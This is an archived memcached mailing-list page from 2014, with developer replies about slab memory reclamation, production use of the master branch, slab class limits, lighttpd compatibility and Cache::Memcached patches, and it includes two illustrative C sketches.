 Hi
 Which is the latest memcached version (1.4 or 1.6)?
 I do not see the engine-pu branch in the memcached git repo.

 Is memcached version 1.6 deprecated?

 Regards

 Vakul



Re: Idea for reclaimation algo

2014-04-09 Thread dormando
 Hi Guys,
 i'm running a specific case where i don't want (actually can't have) evicted 
 items (evictions = 0 ideally)... now i have created a simple
 algo that locks the cache, goes through the linked list and evicts items... it 
 causes some problems, like 10-20ms cache locks in some cases.

 Now i'm thinking about going through each slab's memory (slabs keep a list of 
 allocated memory regions)... looking for items; if an expired item is
 found, evict it... this way i can go eg. 10k items or 1MB of memory at a time 
 + pick slabs with high utilization and run this additional eviction
 only on them... so it'll prevent allocating memory just because unneeded data 
 with a short TTL is occupying the HEAD of the list.

 With this linked-list eviction i'm able to run on 2-3GB of memory... without 
 it, 16GB of memory is exhausted in 1-2h and then memcached starts to
 kill good items (leaving expired ones wasting memory)...

 Any comments?
 Thanks.

You're going a bit against the base algorithm. If stuff is falling out of
16GB of memory without ever being utilized again, why is that critical?
Sounds like you're optimizing the numbers instead of actually tuning
anything useful.

That said, you can probably just extend the slab rebalance code. There's a
hook in there (which I called Angry birds mode) that drives a slab
rebalance when it'd otherwise run an eviction. That code already safely
walks the slab page for unlocked memory and frees it; you could edit it
slightly to check for expiration and then freelist it into the slab class
instead.

Since it's already a background thread you could further modify it to just
wake up and walk pages for stuff to evict.
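
Very roughly, that modification could look like the following. This is a
pure sketch: every helper name below is invented for illustration and does
not exist in the memcached tree:

    /* Sketch of a background thread that walks one slab page per wakeup,
     * returning expired items to the slab class freelist. All helper
     * names here are hypothetical. */
    #include <pthread.h>
    #include <time.h>
    #include <unistd.h>

    typedef struct _item item;              /* memcached's item struct */
    extern pthread_mutex_t cache_lock;      /* same lock evictions take */
    extern void *slab_next_page(void);      /* choose a page to scan */
    extern unsigned int items_per_page(void *page);
    extern item *page_item(void *page, unsigned int i);
    extern unsigned int item_refcount(item *it);
    extern int item_expired(item *it, time_t now);
    extern void unlink_from_lru(item *it);
    extern void freelist_item(item *it);    /* back to the slab class */

    void *expiry_walker(void *arg) {
        (void)arg;
        for (;;) {
            void *page = slab_next_page();
            unsigned int n = items_per_page(page);
            time_t now = time(NULL);
            for (unsigned int i = 0; i < n; i++) {
                pthread_mutex_lock(&cache_lock);
                item *it = page_item(page, i);
                /* only touch unlocked memory, as the rebalance code does */
                if (item_refcount(it) == 0 && item_expired(it, now)) {
                    unlink_from_lru(it);
                    freelist_item(it);
                }
                pthread_mutex_unlock(&cache_lock);
            }
            usleep(100000);  /* sleep between pages to bound lock pressure */
        }
        return NULL;
    }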



Re: memcached master branch - production safe?

2014-04-08 Thread dormando
just use master.

On Tue, 8 Apr 2014, Slawomir Pryczek wrote:

 Is it safe to use master branch code in a production environment? When adding 
 changes to the code, can i just fork master and use that safely, or will i need
 to make modifications against the 1.4.17 code available from the website?
 I noticed there are some differences between the 1.4.17 version and the code 
 available on that branch...

 Thanks.



Re: Setting slab class number.

2014-04-05 Thread dormando
It's not presently possible to do either. I would like to allow people to
supply the slab classes specifically, but we haven't done it yet.

2000 slab classes has its own set of inefficiencies. You should still keep
the number relatively low.
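
For reference, the reason arbitrary class lists aren't expressible today is
that the classes are derived from a single growth factor. Roughly (a
standalone rendering of the -f math with approximate defaults, not the
literal slabs.c code):

    /* Sketch of how -f derives slab class sizes. Constants approximate
     * memcached defaults; this is not the literal slabs.c code. */
    #include <stdio.h>

    #define CHUNK_ALIGN_BYTES 8
    #define MAX_CLASSES       63
    #define ITEM_SIZE_MAX     (1024 * 1024)  /* 1MB page / max item */

    int main(void) {
        double factor = 1.25;       /* the -f argument */
        unsigned int size = 96;     /* ~item header + minimum chunk */
        for (int i = 1; i < MAX_CLASSES && size <= ITEM_SIZE_MAX / factor; i++) {
            if (size % CHUNK_ALIGN_BYTES)   /* round up to alignment */
                size += CHUNK_ALIGN_BYTES - (size % CHUNK_ALIGN_BYTES);
            printf("class %2d: chunk %u bytes, %u chunks per page\n",
                   i, size, ITEM_SIZE_MAX / size);
            size *= factor;         /* each class is the previous * factor */
        }
        return 0;
    }

With -f you only pick the multiplier, so a hand-written list of 200 exact
sizes has nowhere to plug in.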

On Wed, 2 Apr 2014, Slawomir Pryczek wrote:

 Hi guys, i noticed there's a limit on the number of slab classes.
 http://screencast.com/t/RqUovWXVLS
 Is it possible to have eg. 2000 slab classes?

 Alternatively, can i just set the limits individually, by typing eg. 
 200 tab-separated numbers?

 What i want to achieve is a better distribution of slabs, optimized 
 for storing very small values:
 1. 10bytes
 2. 11bytes
 [..]
 100. 10kb
 101. 15kb
 [..]
 189. 100kb
 190. 150kb
 etc.

 It seems that it isn't possible with the current formula and the -f attribute.

 Thanks,
 Slawomir.



Re: MemCached with Lighttpd

2014-03-23 Thread dormando
The memcached library that lighttpd uses, last I checked, was synchronous.
Lighttpd is an async webserver, which means each time it needs to fetch
something from memcached it will block the entire thing waiting for a
response.

It won't block for very long, mind you, but it can't process in parallel.
That is, unless you aren't talking about using memcached from *within*
lighttpd, in which case it probably doesn't matter.

If you intend to push a ton of traffic it might bite you. If not, you'll
be fine with it the way it is.

On Sat, 22 Mar 2014, jResponse IDE wrote:

 Thank you, Ryan.

 On Sunday, March 23, 2014 2:31:36 AM UTC+1, Ryan McElroy wrote:
   Lots of people have successfully used both together, but they aren't
   closely related in any way that I'm aware of, so I wouldn't expect any
   conflicts. Is there anything in particular you're worried about? The
   only thing I can think of is that a library you're using to access
   memcached might not support lighttpd for some reason, but you can
   probably verify that by reading up on your library and testing it
   before switching over.
   Best of luck!

 ~Ryan




 On Sat, Mar 22, 2014 at 1:57 PM, jResponse IDE jrespo...@gmail.com wrote:
   Am I likely to run into any nasty surprises using memcached with
   lighttpd? I have used it often enough in a standard LAMP setup, but I
   now need to move to a setup with Lighttpd and MariaDB on an Ubuntu
   12.04 box. I would imagine that it will work, but I thought it best to
   post here and verify. I'd be much obliged for any feedback.



Re: Cache::Memcached updates / patches

2014-03-12 Thread dormando


On Wed, 12 Mar 2014, Joshua Miller wrote:

 On Wed, Mar 12, 2014 at 12:43 AM, dormando dorma...@rydia.net wrote:



 I should probably just give the thing to you. Would you like me to review
 your work and cut releases or, what would be best?


 If you've got a little time, an extra pair of eyeballs never hurts. 
 Otherwise, I'd be happy to co-maintain and cut releases (user unrtst on
 pause/cpan).
 --
 Josh I.

I'm not sure I do have time... I'll see about looking it over this weekend
maybe. If they look sane I'll see about co-maint.

Thanks for taking the time.



Re: Cache::Memcached updates / patches

2014-03-11 Thread dormando

 https://github.com/unrtst/Cache-Memcached/tree/20140223-patch-cas-support

 This started as just wanting to get a couple small features into 
 Cache::Memcached, but I ended up squashing a bunch of bugs (and merging 
 bugfixes
 from existing and old RT tickets), and kept adding features.

 The repo above includes:
 * benchmarks (to make sure i didn't slow it down)
 * utf8 key fixes
 * utf8 value support
 * compress_ratio
 * compress_methods
 * serialize_methods
 * hash_namespace
 * max_size
 * digest_keys_method and digest_keys_enable
 * digest_keys_threshold
 * touch
 * server_versions
 * cas, gets, gets_multi
 * cas patch for GetParserXS: 
 https://github.com/unrtst/memcached/tree/master/trunk/api/xs/Cache-Memcached-GetParserXS

 All of those are available under Cache::Memcached::Fast except for the 
 digest_keys* items. There's some public and open debate regarding whether
 or not using a digest as the key is a good idea, but I want to use it, and 
 having the option is virtually free, so I included it.
 Cache::Memcached::Fast::Safe automatically uses a digest if the key length 
 exceeds 200 characters, so it's not without precedent.

 I plan on adding ketama (aka consistent hash) support very soon.

 It's probably still advisable to point users to Cache::Memcached::Fast or 
 Cache::Memcached::libmemcached, but fixing the bugs in this module and
 bringing it up to feature parity can't hurt. I almost wish I had given up on 
 C:M and used one of the others instead, but this has been rewarding in
 its own way.

 It would be nice to see these make it to a CPAN release... anyone know who to 
 reach out to for that (one of the RT tickets had said to come here)?

 I'd also welcome any additional review of the branch.

 Thank you,
 --
 Josh I.

I should probably just give the thing to you. Would you like me to review
your work and cut releases or, what would be best?


